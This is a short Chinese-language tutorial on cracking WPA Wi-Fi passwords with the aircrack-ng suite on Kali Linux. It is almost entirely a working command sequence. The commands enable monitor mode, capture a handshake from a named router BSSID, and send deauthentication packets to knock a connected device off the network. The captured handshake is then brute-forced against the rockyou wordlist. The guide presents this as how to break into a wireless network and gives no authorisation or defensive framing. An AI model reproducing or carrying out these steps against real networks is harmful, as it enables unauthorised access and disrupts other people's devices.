无线网络破解 aircrack的使用

1. 安装Kali Linux到U盘中，很方便。

2. Kali Linux自带的rockyou字典 /usr/share/wordlists/rockyou.txt.gz。
   使用前先解压：
   gzip -d /usr/share/wordlists/rockyou.txt.gz

3. 首先断开连接的wifi，命令必须在root权限下执行，不然会有commond not found的报错。
   在终端中执行：airmon-ng

   1. 开启无线网卡的监控模式,wlan0是网卡的名字
      airmon-ng start wlan0
      执行成功之后网卡接口变为wlan0mon；可以使用ifconfig命令查看。
4. 查看wifi网络
   airodump-ng wlan0mon
   记住要破解wifi的频道号和BSSID。
5. 抓取握手包
   使用网卡的监听模式抓取周围的无线网络数据包。我们需要的是包含密码的握手包。
   开始抓包：
   airodump-ng -c 6 –bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
   参数解释：
   -c 指定频道号
   –bssid 指定路由器bssid
   -w 指定抓取的数据包保存位置
6. 强制连接到wifi的设备重新连接路由器
   给连接到wifi的一个设备发送一个deauth（反认证）包，让那个设备断开wifi，随后它自然会再次连接wifi。
   aireplay-ng的生效前提是，wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi，STATION就是连接设备的MAC地址，记住一个。
   打开新终端执行：
   aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
   参数解释：
   -0指定发送反认证包的个数
   -a指定无线路由器BSSID
   -c指定强制断开的设备
   如果成功：
   右上角会提示hand包找到。
7. 停止监听模式。
   airmon-ng stop wlan0mon
8. 跑字典开始解密码
   aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
   参数解释：
   -a2代表WPA的握手包
   -b指定要破解的wifi BSSID。
   -w指定字典文件
   最后是抓取的包